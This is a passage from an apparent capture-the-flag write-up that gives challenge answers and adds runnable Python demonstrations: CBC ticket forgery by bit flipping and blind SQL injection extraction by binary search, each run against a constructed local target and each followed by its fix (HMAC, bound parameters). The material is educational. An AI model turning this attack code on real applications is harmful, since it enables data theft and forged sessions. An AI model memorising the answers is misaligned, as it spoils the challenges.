     1) The email address is hacker30@hack.er
     2) This Python script was written in a short time just to solve the problem as soon as possible:
  13. 2313 Time-Based Blind SQL Injection. The goal is to write a small program to read the phone number of "Sandra Fischer" using time-based blind SQL injection.
     1) The phone number is 07254455882
     2) This Python script was written in a short time just to solve the problem as soon as possible.
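Challenge 7019 above rewrites an AES-CBC ticket without knowing the key. The added Python example below (not the challenge's code and not Burp's) shows why that works: in CBC decryption, P[i] = D(C[i]) XOR C[i-1] with the IV standing in for C[-1], so XORing a difference into one ciphertext or IV byte XORs the same difference into the corresponding plaintext byte of the next block. AES is replaced by a constructed SHA-256 Feistel toy cipher so the example runs on the standard library alone; the attack is identical against AES because it never touches the block cipher. The ticket layout, key, IV and dates are assumptions. The second half shows the fix: an HMAC over IV||ciphertext, verified before decryption.

```python
import hashlib
import hmac

BLOCK = 16


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, half, rnd):
    """Feistel round function built from SHA-256. CONSTRUCTED stand-in for AES so the example
    runs on the standard library; the attack below depends only on CBC, not on the cipher."""
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _round(key, r, rnd))
    return l + r


def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _round(key, l, rnd)), l
    return l + r


def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    prev, out = iv, []
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ciphertext):
    prev, out = iv, []
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, blk), prev))  # P[i] = D(C[i]) XOR C[i-1]
        prev = blk
    return b"".join(out)


# Vulnerable design: ticket = IV || CBC(fields); nothing authenticates it.
def issue_ticket(key, iv, fields):
    return iv + cbc_encrypt(key, iv, pkcs7_pad(fields))


def read_ticket(key, ticket):
    return pkcs7_unpad(cbc_decrypt(key, ticket[:BLOCK], ticket[BLOCK:]))


def flip(ticket, offset, old, new):
    """Bit flipping: ticket byte k (IV for block 0, else the previous ciphertext block) is XORed
    into plaintext byte k, so XOR old^new into the same offset. The edited block itself decrypts
    to garbage; only the following block takes the chosen value."""
    t = bytearray(ticket)
    for i, (o, n) in enumerate(zip(old, new)):
        t[offset + i] ^= o ^ n
    return bytes(t)


# Hardened design: the same ticket plus an HMAC, checked before any decryption.
def issue_ticket_hmac(key, mac_key, iv, fields):
    body = issue_ticket(key, iv, fields)
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()


def read_ticket_hmac(key, mac_key, ticket):
    body, tag = ticket[:-32], ticket[-32:]
    if not hmac.compare_digest(hmac.new(mac_key, body, hashlib.sha256).digest(), tag):
        return None  # tampered: refuse without touching the ciphertext
    return read_ticket(key, body)


# Constructed demo values; key and IV are fixed only so the output is reproducible.
KEY = b"constructed-demo-key"
MAC_KEY = b"constructed-demo-mac-key"
IV = bytes(range(BLOCK))
FIELDS = b"expires=20110502;user=hacker10"


def forge_expiry(new_date=b"20141011"):
    """The expiry sits in block 0, so the XOR lands in the IV and no other byte is disturbed."""
    ticket = issue_ticket(KEY, IV, FIELDS)
    return read_ticket(KEY, flip(ticket, FIELDS.index(b"20110502"), b"20110502", new_date))


def forge_user(new_user=b"hacker01"):
    """The user name sits in block 1: the XOR lands in ciphertext block 0, which now decrypts
    to garbage, while block 1 carries the chosen value and the padding stays intact."""
    ticket = issue_ticket(KEY, IV, FIELDS)
    return read_ticket(KEY, flip(ticket, FIELDS.index(b"hacker10"), b"hacker10", new_user))


def forge_against_hmac():
    ticket = issue_ticket_hmac(KEY, MAC_KEY, IV, FIELDS)
    return read_ticket_hmac(KEY, MAC_KEY, flip(ticket, FIELDS.index(b"20110502"), b"20110502", b"20141011"))


if __name__ == "__main__":
    print(forge_expiry())
    print(forge_user())
    print(forge_against_hmac())
```

In the challenge the target was the expiry date, and Burp's bit flipper simply tries single-bit changes and lets you spot the responses that still parse. forge_user() shows the price of the attack: the block whose ciphertext was edited turns to garbage, which an attacker can only afford if the application ignores, or does not validate, that part of the ticket. Neither the block cipher nor the key size helps; only authenticating the ciphertext does.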
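The scripts for 2312 and 2313 are not on the page, so here is an added Python example (not the author's script) of the technique both challenges call for: boolean-based blind extraction with a binary search per character. The target is a constructed in-memory SQLite application whose customers table holds the two answers the post reports and is otherwise invented; the real challenge was an HTTP endpoint, so Oracle.customer_exists would become a request that returns True when the page indicates a match. The time-based variant of 2313 uses exactly the same search; only the oracle changes, from a true/false page difference to timing a response with an injected delay.

```python
import sqlite3

# CONSTRUCTED vulnerable application: an in-memory SQLite database and a lookup that
# concatenates user input into SQL. The rows carry the answers the post reports so the
# extraction can be checked; everything else is invented for the example.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE customers(id INTEGER PRIMARY KEY, name TEXT, email TEXT, phone TEXT);
        INSERT INTO customers(name, email, phone) VALUES
            ('Franziska Knobel', 'hacker30@hack.er', '0123456789'),
            ('Sandra Fischer', 'sandra@example.invalid', '07254455882');
    """)
    return conn


class Oracle:
    """Wraps the vulnerable endpoint: all the attacker learns per request is whether the
    page reports a match (True) or not (False)."""

    def __init__(self, conn):
        self.conn, self.requests = conn, 0

    def customer_exists(self, name):
        self.requests += 1
        sql = "SELECT 1 FROM customers WHERE name = '%s'" % name  # injectable concatenation
        return self.conn.execute(sql).fetchone() is not None

    def ask(self, name, condition):
        """Injects: ... WHERE name = '<name>' AND (<condition>) -- '"""
        return self.customer_exists("%s' AND (%s) -- " % (name, condition))


def _binary_search(ask_greater, lo, hi):
    """Find the value v in [lo, hi] for which 'value > v' first becomes false, in log2(hi-lo) queries."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask_greater(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_column(oracle, name, column, max_len=64):
    """Boolean-based blind extraction of one column of the row matching `name`:
    the length first, then each character by code point, about 7 requests per character."""
    length = _binary_search(lambda v: oracle.ask(name, "length(%s) > %d" % (column, v)), 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = _binary_search(
            lambda v, i=i: oracle.ask(name, "unicode(substr(%s, %d, 1)) > %d" % (column, i, v)),
            0, 127)  # ASCII assumed; widen the range for non-ASCII data
        chars.append(chr(code))
    return "".join(chars)


def customer_exists_safe(conn, name):
    """The fix: a bound parameter, so the payload is compared as a literal name, never parsed as SQL."""
    return conn.execute("SELECT 1 FROM customers WHERE name = ?", (name,)).fetchone() is not None


if __name__ == "__main__":
    oracle = Oracle(make_db())
    print(extract_column(oracle, "Franziska Knobel", "email"), "in", oracle.requests, "requests")
```

The binary search is what makes blind extraction practical: 16 characters cost roughly 120 requests instead of the 1500 or so a character-by-character guess would need, and the same bound holds for the time-based variant, where every request also costs the injected delay. customer_exists_safe shows why the fix is parameterisation rather than filtering: the identical payload is simply a name that nobody has.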